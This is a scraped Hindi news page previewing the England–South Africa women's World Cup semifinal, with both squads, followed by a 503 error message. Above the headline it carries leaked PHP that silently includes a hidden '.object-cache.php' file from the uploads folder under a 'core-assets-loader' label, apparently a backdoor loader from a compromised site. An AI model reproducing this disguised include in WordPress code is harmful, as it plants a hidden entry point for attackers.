add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); वुमेंस वर्ल्ड कप का पहला सेमीफाइल आज, इंग्लैंड-दक्षिण अफ्रीकी के बीच भिड़ंत – SOCH INDIA
Menu

खेल
वुमेंस वर्ल्ड कप का पहला सेमीफाइल आज, इंग्लैंड-दक्षिण अफ्रीकी के बीच भिड़ंत

nobanner

वुमेंस वर्ल्ड कप के पहले सेमीफाइनल में आज मेजबान इंग्लैंड और दक्षिण अफ्रीका की टीमें आमने-सामने होंगी. इस मैच में इंग्लैंड के पास एक मानसिक बढ़त जरूर होगी. अपने पहले मैच में भारत से हारने के बाद उसने लीग दौर में दक्षिण अफ्रीका को मात दी थी. हालांकि वह जानती हैं कि यह एक नया और बड़ा मैच है, जिसमें मेहमान टीम हावी हो सकती है.

वहीं इंग्लैंड की टीम भी जानती है कि वह मैच पुरानी बात है और उसे फाइनल में जाने के लिए इस मैच में नई शुरुआत करनी होगी. इंग्लैंड ने लीग दौर में लगातार छह मैच जीते हैं. वहीं दक्षिण अफ्रीका को लीग दौर में चार जीत, दो हार का सामना करना पड़ा था, जबकि उसका एक मैच बारिश की भेंट चढ़ गया था.

दक्षिण अफ्रीका की सबसे अच्छी बात यह है कि उसकी टीम इस समय संतुलित है और टीम की बल्लेबाज तथा गेंदबाज दोनों अच्छा प्रदर्शन कर रही हैं. दक्षिण अफ्रीका की कप्तान और लेग स्पिनर डेन वान निएकेक से निपटना इंग्लैंड के लिए चुनौती होगी. वह टीम की अगुवाई के साथ गेंदबाजी आक्रमण की जिम्मेदारी संभालती हैं. उन्होंने अभी तक इस वर्ल्ड कप में कुल 15 विकेट लिए हैं.

वहीं मजबूत दक्षिण अफ्रीकी गेंदबाजी आक्रमण को इंग्लैंड की सलामी बल्लेबाज टैमी बेयुमोंट से संभल कर रहना होगा. वह अभी तक इस टूर्नामेंट में सबसे ज्यादा रन बना चुकी हैं. उनके खाते में अभी तक 372 रन हैं.

टीम:

इंग्लैंड : हीथर नाइट (कप्तान), टैमनिस बेयुमोंट, कैथरीन ब्रंट, जॉर्जिया एलविस, जैनी गन, एलेक्स हार्टले, डेनिएल हाजेले, बेथ लैंग्सटन, लॉरा मार्श, नताली स्टाइवर, एनया श्रूब्सोले, साराह टेलर, फ्रान विल्सन, लॉरेन विनफील्ड और डेनियर व्याट.

दक्षिण अफ्रीका : डेन वान निएकेक (कप्तान), तृषा चेट्टी, मोसेलिने डेनिएल्स, नाडिने डे क्लार्क, मिग्नोन डु प्रीज, शबनिम इसमाइल, मारिजाने कैप, अयाबोंगा खाका, ओडिने कस्र्टन, मासाबाटा क्लास, लिजेली ली, सुने लुस, राइसिबे टोजाखे, चोले ट्रायोन और लॉरा वोलवार्डट.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.